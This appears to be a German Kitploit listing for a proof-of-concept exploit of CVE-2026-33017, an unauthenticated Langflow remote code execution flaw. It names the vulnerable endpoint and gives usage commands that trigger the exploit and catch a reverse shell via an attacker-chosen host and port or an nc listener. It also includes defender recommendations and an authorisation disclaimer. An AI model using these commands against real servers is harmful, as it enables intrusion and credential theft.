Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-33017-Langflop — CVE-2026-33017 Langflow RCE PoC | Kitploit
Tools/GitHubGitHub/tatosec/cve-2026-33017-langflop
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsPayload-Entwicklung
GitHubtatosec/cve-2026-33017-langflop

CVE-2026-33017-Langflop

CVE-2026-33017 Langflow RCE PoC

Repository anzeigen
3vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-33017 Langflow („Langflop") Unauthentifizierter RCE-PoC

PoC für die unauthentifizierte Codeausführungsschwachstelle build_public_tmp in Langflow. Er lädt eine bösartige Komponente in einen öffentlichen Flow hoch, löst einen Build aus und fängt eine Reverse Shell.

Nur für autorisierte Sicherheitstests. Verwende ihn nur gegen Systeme, die dir gehören oder für die du eine ausdrückliche Testgenehmigung hast.

Anforderungen

  • Python 3
  • requests (pip install requests)

Verwendung

Starte den integrierten Listener und löse den Exploit in einem Rutsch aus:

root@kitploit:~
python3 poc.py \
  --url https://target:7860 \
  --flow-id <public-flow-uuid> \
  --lhost <your-ip> \
  --lport 4444 \
  --listen

Sobald sich die Shell verbindet, wird automatisch versucht, sie zu einer vollständig interaktiven Shell zu erweitern.

Falls du lieber deinen eigenen Listener verwenden möchtest (z. B. nc -lvnp 4444), lass weg:

Tool herunterladen
--listen
root@kitploit:~
python3 poc.py --url https://target:7860 --flow-id <uuid> --lhost <your-ip> --lport 4444

Optionen

FlagBeschreibung
--urlZiel-URL des Langflow-Servers (erforderlich)
--flow-idUUID des freigegebenen öffentlichen Flows (erforderlich)
--lhostIP-Adresse für den Reverse-Shell-Callback (erforderlich)
--lportPort für den Reverse-Shell-Callback (erforderlich)
--listenIntegrierten Listener ausführen
--timeoutHTTP-Request-Timeout in Sekunden (Standard: 30)
-k, --insecureTLS-Zertifikatsprüfung deaktivieren (selbstsignierte / abgelaufene Zertifikate)
--no-upgradeAutomatisches TTY-Upgrade überspringen, einfache Zeilen-Shell verwenden

Informationen

CVE-2026-33017 ist eine unauthentifizierte RCE im Endpunkt POST /api/v1/build_public_tmp/{flow_id}/flow von Langflow, der von Angreifern bereitgestellten Python-Code aus Flow-Knoten-Definitionen ohne Sandboxing ausführt. Weitere Informationen findest du in den folgenden Ressourcen:

  • Sysdig Threat Research-Bericht: CVE-2026-33017: So kompromittierten Angreifer Langflow-KI-Pipelines in 20 Stunden
  • NVD: CVE-2026-33017

Empfehlungen (Defender)

Maßnahmen aus dem Sysdig Threat Research-Bericht:

  • Aktualisiere Langflow sofort. Falls noch keine gepatchte Version verfügbar ist, beschränke den Netzwerkzugriff auf den Endpunkt /api/v1/build_public_tmp oder deaktiviere das öffentliche Erstellen von Flows vollständig.
  • Prüfe Umgebungsvariablen und Geheimnisse auf jeder öffentlich erreichbaren Langflow-Instanz. Rotiere vorsorglich API-Schlüssel, Datenbankpasswörter und Cloud-Anmeldedaten.
  • Überwache ausgehende Verbindungen zu ungewöhnlichen Ports oder bekannten Callback-Diensten (oastify.com, interact.sh, dnslog.cn), die auf aktive Ausnutzung und Datenerxtraktion hindeuten.
  • Beschränke den Netzwerkzugriff auf Langflow-Instanzen mithilfe von Firewall-Regeln oder eines Reverse-Proxys mit Authentifizierung. !!Langflow sollte ohne Authentifizierungsschicht nicht direkt im Internet erreichbar sein!!
  • Erfasse die KI/ML-Werkzeuge in deiner Umgebung. Plattformen wie Langflow, n8n und andere Workflow-Automatisierungstools werden zunehmend zum Ziel, da sie oft mit umfassendem API-Zugriff laufen und außerhalb standardmäßiger Sicherheitsüberprüfungsprozesse bereitgestellt werden.

Haftungsausschluss

Dieses Tool wird für Forschung und autorisierte Penetrationstests bereitgestellt. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden.